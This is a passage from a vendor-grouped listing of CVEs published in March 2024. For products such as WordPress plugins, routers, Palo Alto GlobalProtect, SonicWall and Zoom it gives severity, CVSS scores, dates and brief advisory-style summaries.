CVE-2024-1126 | Medium | 4.3 |  | 2024-03-13 | The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_attendees_email_by_event_id() function in all versions up to, and includi…

Movistar · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2414 | High | 8.8 |  | 2024-03-13 | The primary channel is unprotected on Movistar 4G router affecting E version S_WLD71-T1_v2.0.201820.
CVE-2024-2415 | High | 7.8 |  | 2024-03-13 | Command injection vulnerability in Movistar 4G router affecting version ES_WLD71-T1_v2.0.201820.
CVE-2024-2416 | Medium | 6.5 |  | 2024-03-13 | Cross-Site Request Forgery vulnerability in Movistar's 4G router affecting version ES_WLD71-T1_v2.0.201820.

Palo Alto Networks · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2431 | Medium | 5.5 |  | 2024-03-13 | An issue in the Palo Alto Networks GlobalProtect app enables a non-privileged user to disable the GlobalProtect app in configurations that allow a user to disable GlobalProtect with a passcode.
CVE-2024-2432 | Medium | 4.5 |  | 2024-03-13 | A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges.
CVE-2024-2433 | Medium | 4.3 |  | 2024-03-13 | An improper authorization vulnerability in Palo Alto Networks Panorama software enables an authenticated read-only administrator to upload files using the web interface and completely fill one of the disk partitions with those uploaded fil…

Peering-manager · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28114 | High | 8.1 |  | 2024-03-12 | Peering Manager is a BGP session management tool.
CVE-2024-28112 | Medium | 6.1 |  | 2024-03-12 | Peering Manager is a BGP session management tool.
CVE-2024-28113 | Low | 3.5 |  | 2024-03-12 | Peering Manager is a BGP session management tool.

Pluginus · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1795 | High | 8.8 |  | 2024-03-15 | The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the u…
CVE-2024-1796 | Medium | 6.4 |  | 2024-03-15 | The HUSKY – Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitizati…
CVE-2023-50861 | Medium | 4.3 |  | 2024-03-15 | Cross-Site Request Forgery (CSRF) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce (formerly WOOF). This issue affects HUSKY – Products Filter for WooCommerce (formerly WOOF): from n/a through 1.3.4.3.

Properfraction · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1806 | Medium | 6.4 |  | 2024-03-13 | The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to…
CVE-2024-1535 | Medium | 6.4 |  | 2024-03-13 | The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to…
CVE-2024-1409 | Medium | 6.4 |  | 2024-03-13 | The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [reg-select-role] shortcode in all…

Skyhigh · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0313 | Medium | 5.5 |  | 2024-03-14 | A malicious insider exploiting this vulnerability can circumvent existing security controls put in place by the organization.
CVE-2024-0312 | Medium | 5.5 |  | 2024-03-14 | A malicious insider can uninstall Skyhigh Client Proxy without a valid uninstall password.
CVE-2024-0311 | Medium | 5.5 |  | 2024-03-14 | A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code.

Sonicwall · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-22397 | High | 8.3 |  | 2024-03-14 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in the SonicOS SSLVPN portal allows a remote authenticated attacker as a firewall 'admin' user to store and execute arbitrary JavaScript code.
CVE-2024-22396 | Medium | 5.3 |  | 2024-03-14 | An Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload.
CVE-2024-22398 | Medium | 4.9 |  | 2024-03-14 | An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and de…

Surya2developer · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2481 | Medium | 6.5 |  | 2024-03-15 | A vulnerability, which was classified as critical, was found in Surya2Developer Hostel Management System 1.0.
CVE-2024-2483 | Medium | 4.3 |  | 2024-03-15 | A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0.
CVE-2024-2482 | Low | 3.7 |  | 2024-03-15 | A vulnerability has been found in Surya2Developer Hostel Management Service 1.0 and classified as problematic.

Vantage6 · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-24562 | Medium | 5.4 |  | 2024-03-14 | vantage6-UI is the official user interface for the vantage6 server.
CVE-2024-24770 | Medium | 5.3 |  | 2024-03-14 | vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation.
CVE-2024-23823 | Medium | 4.2 |  | 2024-03-14 | vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation.

Wpdeveloper · 3 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1536 | High | 7.4 |  | 2024-03-13 | The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and includi…
CVE-2024-1854 | Medium | 6.4 |  | 2024-03-13 | The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sa…
CVE-2024-1537 | Medium | 6.4 |  | 2024-03-13 | The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including…

Argoproj · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28175 | Critical | 9.0 |  | 2024-03-13 | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.
CVE-2023-50726 | Medium | 6.4 |  | 2024-03-13 | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.

Artibot · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0447 | Medium | 5.0 |  | 2024-03-13 | The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the artibot_update function in all versions up to, and including, 1.1.6.
CVE-2024-0449 | Medium | 4.4 |  | 2024-03-13 | The ArtiBot Free Chat Bot for WordPress WebSites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping.

Autopolis · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0683 | High | 7.3 |  | 2024-03-13 | The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14.
CVE-2024-2395 | High | 7.3 |  | 2024-03-12 | The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14.

Bdthemes · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1508 | Medium | 6.4 |  | 2024-03-13 | The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient inp…
CVE-2024-1507 | Medium | 6.4 |  | 2024-03-13 | The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.3 due to insufficient input sanitizatio…

Carmelo · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25250 | Critical | 9.8 |  | 2024-03-13 | SQL Injection vulnerability in code-projects Agro-School Management System 1.0 allows attackers to run arbitrary code via the Login page.
CVE-2024-24105 | High | 7.8 |  | 2024-03-13 | SQL Injection vulnerability in Code-projects Computer Science Time Table System 1.0 allows attackers to run arbitrary code via adminFormvalidation.php.

Cloudflare · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1765 | Medium | 5.9 |  | 2024-03-12 | Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client.
CVE-2024-1410 | Low | 3.7 |  | 2024-03-12 | Cloudflare quiche was discovered to be vulnerable to unbounded storage of information related to connection ID retirement, which could lead to excessive resource consumption.

Codecabin · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1582 | Medium | 6.4 |  | 2024-03-13 | The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgmza' shortcode in all versions up to, and including, 9.0.32 due to insufficient input sanitization and output e…
CVE-2023-4839 | Medium | 4.4 |  | 2024-03-13 | The WP Go Maps for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping.

Codename065 · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6954 | Medium | 6.4 |  | 2024-03-13 | The Download Manager Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.2.85 due to insufficient input sanitization and output escaping on user suppli…
CVE-2023-6785 | Medium | 5.3 |  | 2024-03-13 | The Download Manager plugin for WordPress is vulnerable to unauthorized file download of files added via the plugin in all versions up to, and including, 3.2.84.

Cyberlord92 · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2172 | Critical | 9.8 | - | 2024-03-13 | The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and includ…
CVE-2024-0681 | Medium | 5.3 | - | 2024-03-13 | The Page Restriction WordPress (WP) – Protect WP Pages/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4.

Devitemsllc · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1421 | Medium | 6.4 | - | 2024-03-12 | The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘border_type’ attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input…
CVE-2024-1397 | Medium | 6.4 | - | 2024-03-12 | The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on…

Directus · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28239 | Medium | 5.4 | - | 2024-03-12 | Directus is a real-time API and App dashboard for managing SQL database content.
CVE-2024-28238 | Low | 2.3 | - | 2024-03-12 | Directus is a real-time API and App dashboard for managing SQL database content.

Edge22 · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1479 | Medium | 5.3 | - | 2024-03-13 | The WP Show Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 via the wpsp_display function.
CVE-2024-1452 | Medium | 4.3 | - | 2024-03-13 | The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop.

File Manager · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6825 | Critical | 9.9 | - | 2024-03-13 | The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the mk_file_folder_manager…
CVE-2023-7015 | Medium | 6.1 | - | 2024-03-13 | The File Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tb' parameter in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping.

Gpac · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28318 | High | 7.1 | - | 2024-03-15 | gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out-of-bounds write vulnerability via swf_get_string at scene_manager/swf_parse.c:325.
CVE-2024-28319 | Medium | 6.2 | - | 2024-03-15 | gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out-of-bounds read vulnerability via gf_dash_setup_period at media_tools/dash_client.c:6374.

Inisev · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0559 | Medium | 6.5 | - | 2024-03-11 | The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scr…
CVE-2024-0561 | Medium | 5.4 | - | 2024-03-11 | The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Sc…

Mha Sistemas · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2480 | Medium | 6.3 | - | 2024-03-15 | A vulnerability classified as critical was found in MHA Sistemas arMHAzena 9.6.0.0.
CVE-2024-2479 | Low | 3.5 | - | 2024-03-15 | A vulnerability classified as problematic has been found in MHA Sistemas arMHAzena 9.6.0.0.

Najeebmedia · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0830 | Medium | 4.3 | - | 2024-03-13 | The Comments Extra Fields For Post, Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.
CVE-2024-0829 | Medium | 4.3 | - | 2024-03-13 | The Comments Extra Fields For Post, Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0.

Ndijkstra · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1645 | Medium | 4.3 | - | 2024-03-11 | The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3.
CVE-2024-1400 | Medium | 4.3 | - | 2024-03-11 | The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3.

Rejetto · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1226 | High | 7.5 | - | 2024-03-12 | The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers.
CVE-2024-1227 | Medium | 6.5 | - | 2024-03-12 | An open redirect vulnerability, the exploitation of which could allow an attacker to create a custom URL and redirect a legitimate page to a malicious site.

Roxnor · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1763 | Medium | 6.5 | - | 2024-03-13 | The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp_social/v1/ REST API endpoint in all versions up to, and including, 3.0.0.
CVE-2024-1585 | Medium | 6.4 | - | 2024-03-13 | The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escapi…

Sky Co.,ltd. · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-21805 | High | 7.8 | - | 2024-03-12 | Improper access control vulnerability exists in the specific folder of SKYSEA Client View versions from Ver.16.100 prior to Ver.19.2.
CVE-2024-24964 | Medium | 6.3 | - | 2024-03-12 | Improper access control vulnerability exists in the resident process of SKYSEA Client View versions from Ver.11.220 prior to Ver.19.2.

Themegrill · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1462 | Medium | 5.3 | - | 2024-03-13 | The Maintenance Page plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 1.0.8 via the REST API.
CVE-2024-1370 | Medium | 5.3 | - | 2024-03-13 | The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8.

Tibco Software Inc. · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1138 | High | 8.8 | - | 2024-03-12 | The FTL Server component of TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition contains a vulnerability that allows a low privileged attacker with network access to execute a privilege escalation on the affected ftlserver.
CVE-2024-1137 | Medium | 4.3 | - | 2024-03-12 | The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients.

Ultimatemember · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1071 | Critical | 9.8 | - | 2024-03-13 | The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficie…
CVE-2024-2123 | High | 7.2 | - | 2024-03-13 | The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and incl…

Wago · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2015-10123 | High | 8.8 | - | 2024-03-13 | An unauthenticated remote attacker could send specifically crafted packets to an affected device.
CVE-2018-25090 | Medium | 5.4 | - | 2024-03-13 | An unauthenticated remote attacker can use an XSS attack due to improper neutralization of input during web page generation.

Zemana · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2204 | Medium | 5.5 | - | 2024-03-15 | Zemana AntiLogger v2.74.204.664 is vulnerable to a Denial of Service (DoS) vulnerability by triggering the 0x80002004 and 0x80002010 IOCTL codes of the zam64.sys and zamguard64.sys drivers.
CVE-2024-2180 | Medium | 5.5 | - | 2024-03-15 | Zemana AntiLogger v2.74.204.664 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x80002020 IOCTL code of the zam64.sys and zamguard64.sys drivers.

Zoom · 2 CVEs

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-24693 | High | 7.2 | - | 2024-03-13 | Improper access control in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.
CVE-2024-24692 | Medium | 5.3 | - | 2024-03-13 | Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.

Abocms · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25227 | Critical | 9.8 | - | 2024-03-15 | SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page.

Advancedplugins · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28390 | Critical | 9.8 | - | 2024-03-14 | An issue in Advanced Plugins ultimateimagetool module for PrestaShop before v.2.2.01, allows a remote attacker to escalate privileges and obtain sensitive information via Improper Access Control.

Aio-libs · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27305 | Medium | 5.3 | - | 2024-03-12 | aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio.

Ajexperience · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1068 | High | 7.2 | - | 2024-03-11 | The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.

Amd · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2193 | Medium | 5.7 | - | 2024-03-15 | A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed.

Ameliabooking · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1484 | Medium | 6.1 | - | 2024-03-13 | The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and…

Appleple · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27279 | Medium | 6.5 | - | 2024-03-12 | Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series Ver.3.1.9 and earlier, Ver.3.0.x series Ver.3.0.30 and earlier, Ver.2.11.x series Ver.2.11.59 and earlier, Ver.2.10.x series Ver.2.10.51 and earlier, and Ver.2.9 and e…

Aweber · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1793 | High | 7.2 | - | 2024-03-13 | The AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due…

Barrykooij · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0592 | Medium | 5.4 | - | 2024-03-13 | The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1.

Basix · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25593 | Medium | 6.5 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS. This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.5.

Bitapps · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1640 | Medium | 5.3 | - | 2024-03-13 | The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient user validation on the bitforms_up…

Blossomthemes · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2107 | Medium | 5.8 | - | 2024-03-12 | The Blossom Spa theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.3 via generated source.

Bluecoral · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0898 | Medium | 4.4 | - | 2024-03-13 | The Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to ins…

Bobbingwide · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2256 | Medium | 6.4 | - | 2024-03-14 | The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization an…

Boldgrid · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0386 | High | 7.2 | - | 2024-03-12 | The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping.

Bradwenqiang · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2478 | Medium | 6.3 | - | 2024-03-15 | A vulnerability was found in BradWenqiang HR 2.0.

Brainstormforce · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1237 | Medium | 6.4 | - | 2024-03-13 | The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping.

Broadcom · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-43279 | Medium | 6.5 | - | 2024-03-12 | Null Pointer Dereference in mask_cidr6 component at cidr.c in Tcpreplay 4.4.4 allows attackers to crash the application via crafted tcprewrite command.

Burstbv · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1894 | Medium | 6.4 | - | 2024-03-13 | The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to…

Canon Inc. · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2184 | Critical | 9.8 | - | 2024-03-11 | Buffer overflow in identifier field of WSD probe request process of Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execu…

Castos · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-6444 | Medium | 5.3 | - | 2024-03-11 | The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.

Catchsquare · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27189 | Medium | 6.5 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in catchsquare WP Social Widget allows Stored XSS. This issue affects WP Social Widget: from n/a through 2.2.5.

Chatgptnextweb · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2023-49785 | Critical | 9.1 | - | 2024-03-12 | NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT.

Choijun · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2249 | Medium | 6.4 | - | 2024-03-14 | The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input saniti…

Chrisbadgett · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-0377 | Medium | 5.3 | - | 2024-03-13 | The LifterLMS – WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1.

Cimg · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-26540 | High | 7.8 | - | 2024-03-15 | A heap-based buffer overflow in CImg before 3.3.3 can occur via a crafted file to cimg_library::CImg<unsigned char>::_load_analyze.

Citrix · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2049 | Medium | 6.5 | - | 2024-03-12 | Server-Side Request Forgery (SSRF) in Citrix SD-WAN Standard/Premium Editions on or after 11.4.0 and before 11.4.4.46 allows an attacker to disclose limited information from the appliance via Access to management IP.

Ckan · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-27097 | Medium | 4.3 | - | 2024-03-13 | A user endpoint didn't perform filtering on an incoming parameter, which was added directly to the application log.

Codeium · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-28120 | Medium | 6.5 | - | 2024-03-11 | codeium-chrome is an open source code completion plugin for the chrome web browser.

Codepeople · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2020 | High | 7.2 | - | 2024-03-13 | The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping.

Codeworkweb · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-2130 | Medium | 6.4 | - | 2024-03-12 | The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes.

Collabora · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25114 | Low | 2.6 | - | 2024-03-11 | Collabora Online is a collaborative online office suite based on LibreOffice technology.

Comesio · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1380 | Medium | 5.3 | - | 2024-03-13 | The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0 (Free) and 2.25…

Concerted Action · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-25921 | High | 7.1 | - | 2024-03-15 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS. This issue affects Action Network: from n/a through 1.4.2.

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1487 | Medium | 5.4 | - | 2024-03-11 | The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks.

Conversios · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
CVE-2024-1203 | High | 8.8 | - | 2024-03-13 | The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 7.0.7 due to insuff…

Cool Plugins · 1 CVE

CVE | Severity | CVSS | KEV | Published | Summary
